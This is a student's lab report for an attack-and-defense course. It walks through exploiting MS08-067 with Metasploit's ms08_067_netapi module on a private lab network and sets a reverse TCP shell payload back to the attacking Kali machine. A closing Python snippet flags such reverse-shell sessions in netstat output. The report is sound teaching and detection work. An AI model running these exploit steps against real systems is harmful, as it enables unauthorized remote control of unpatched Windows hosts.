2017-2018-2 20179205 "Network Attack and Defense Technology and Practice" Windows Attack Experiment

Windows Attack Experiment

Experiment description:

Use Metasploit to attack MS08-067, and submit screenshots (no fewer than five) showing the process of correctly obtaining the remote shell.

MS08-067 Vulnerability Introduction

The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if an affected system receives a specially crafted RPC request. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and worms that exploit it already exist.

Experimental tools

The attack machine used in this experiment is Kali, and the target machine is Win2kServer.

Attack machine: 192.168.92.147
Target machine: 192.168.92.148

Experimental steps:

1. First, have the attack machine and the target machine ping each other, then open msfconsole in the Kali terminal

2. Check whether a module for the ms08_067 vulnerability exists; the returned information lists the exploit module that was found

3. Enter the command use exploit/windows/smb/ms08_067_netapi to enter the exploit module. You can then enter commands to display information about it, such as:

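Entering show payloads displays the available payloads, such as shell_reverse_tcp

Use the command set payload generic/shell_reverse_tcp to set the payload

Entering show targets displays the operating system versions of the targets that can be attacked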

4. Enter show options to display the options that must be set before the attack

5. Set the addresses of the attack machine and the target machine, then use the command show options to view the payload settings again

Enter the command set LHOST + attack machine IP, i.e. set LHOST 192.168.92.147;
Enter the command set RHOST + target machine IP, i.e. set RHOST 192.168.92.148;

6. Enter the command exploit to start the attack; the following picture shows the result of a successful attack

7. Enter ipconfig/all in the remote shell on the attack machine and on the target machine itself, and compare the IP addresses: the results are the same

8. Enter the "netstat -a" command to see which ports are open on the target machine

9. Enter the "netstat -n" command to view the network connections on the target machine's ports
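
The reverse shell from steps 3 to 6 shows up in the target machine's netstat output as an ESTABLISHED session from a local port the host does not listen on. The following Python sketch is an added example, not part of the original report, that flags such sessions in "netstat -an" text; the sample output, its port numbers and the allowed_remotes parameter are constructed assumptions.

```python
# Added example (not from the original report): flag outbound TCP sessions
# in Windows `netstat -an` output. SAMPLE is constructed, including its ports.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.92.148:139     0.0.0.0:0              LISTENING
  TCP    192.168.92.148:445     192.168.92.147:41234   ESTABLISHED
  TCP    192.168.92.148:1031    192.168.92.147:4444    ESTABLISHED
  TCP    192.168.92.148:1029    192.168.92.2:53        TIME_WAIT
  UDP    0.0.0.0:445            *:*
"""


def parse_tcp(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state) per TCP row."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0].upper() != "TCP":
            continue  # headers, blank lines, UDP rows (no state column)
        local, remote, state = parts[1], parts[2], parts[3].upper()
        lip, _, lport = local.rpartition(":")
        rip, _, rport = remote.rpartition(":")
        if lport.isdigit() and rport.isdigit():
            yield lip, int(lport), rip, int(rport), state


def find_outbound(text, allowed_remotes=frozenset()):
    """ESTABLISHED sessions the host initiated: local port is not a listener."""
    rows = list(parse_tcp(text))
    listening = {lport for _, lport, _, _, state in rows if state == "LISTENING"}
    hits = []
    for lip, lport, rip, rport, state in rows:
        if state != "ESTABLISHED" or lport in listening:
            continue  # inbound session to a service the host offers
        if rip in allowed_remotes:
            continue  # expected peer, e.g. a backup or update server
        hits.append((f"{lip}:{lport}", f"{rip}:{rport}"))
    return hits


if __name__ == "__main__":
    for local, remote in find_outbound(SAMPLE):
        print(f"unexpected outbound session {local} -> {remote}")
```

The inbound SMB session on port 445 is not flagged because 445 is a listening port; only the session the server itself opened is reported.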
